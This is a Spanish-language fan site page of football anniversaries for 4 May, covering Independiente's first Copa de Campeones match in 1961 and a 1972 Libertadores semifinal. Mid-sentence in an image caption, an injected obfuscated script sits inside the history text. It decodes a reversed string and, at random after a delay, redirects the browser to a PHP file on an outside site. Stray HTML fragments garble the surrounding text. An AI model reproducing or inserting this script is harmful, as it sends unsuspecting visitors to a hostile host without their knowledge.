Conectate con nosotros

Efemérides

Efemérides del 4 de Mayo

No se puede amar lo que no se conoce. Estas efemérides son parte de la brillante historia del Glorioso INDEPENDIENTE de Avellaneda.

1961 – Independiente por haber sido campeón de Primera División en 1960, fue el segundo equipo del país en jugar la Copa de Campeones de América, ya que en su primera edición en 1960 había sido San Lorenzo el representante de Argentina. En ese entonces, solamente disputaban la Copa los campeones de cada país.

Independiente juega el primer partido de su historia en la Copa, de local pero en cancha de los vecinos, ya que La Visera se encontraba en plena remodelación, construyéndose la segunda visera.

Fue derrota frente al Palmeiras de Brasil por 0 a 2,con goles de Gildo a los 33’  y Zequinha a los 85’. Independiente jugó muy mal, sin ideas ni claridad, e incluso recurriendo al juego brusco, para contrarrestar la habilidad de la visita, por lo que el equipo fue duramente criticado por El Gráfico.

El equipo fue: Bernardico, Acevedo, Navarro, Rolan, Silveira, Maldonado, Vázquez (45’ Saporiti), Douksas, Suárez, D’Ascenzo y Cruz, siendo Osvaldo Brandao el D.T.  

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»75″ height=»58″/></figure></div>



<p><strong>1972</strong> – Independiente tiene que disputar su último partido por la segunda fase, o <strong>fase semifinal, de la Copa Libertadores 1972</strong>, recibiendo al San Pablo de Brasil.  Independiente tenía que ganar sí o sí para superarlo y quedar como líder, mientras que el otro integrante del grupo era Barcelona de Ecuador que ya estaba sin chances. Solamente el líder del grupo accedía a la final.</p>



<div class=

El Rojo paró un equipo netamente de ataque y se dispuso a dominar el partido, siendo  “Pepé” Santoro, un espectador, sumado a las 60 mil personas que se presentaron a la cita ese día en la Doble Visera.

El arquero de la visita se convertía en figura, hasta que a los 20’ comete un error en la salida tras un tiro de esquina de Agustín Balbuena, que convierte un gol olímpico, y 4’  más tarde Dante “el Tano” Mírcoli estira la ventaja al 2 a 0 definitivo.

El equipo de ese día fue: Santoro; Commisso, , Garisto y Pavoni; Raimondo, Pastoriza y Semenewicz; Balbuena, Magán (46’ Maglioni) y Mírcoli (46’ Saggioratto), siendo Pedro Dellacha el D.T.  Mientras que la visita con figuras conocidas como los uruguayos Pablo Forlán y Pedro Virgilio Rocha, sumados a Zé Carlos.

Con la victoria Independiente quedó como líder del grupo de semifinales y accedió a la final de la copa al igual que Universitario de Perú.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides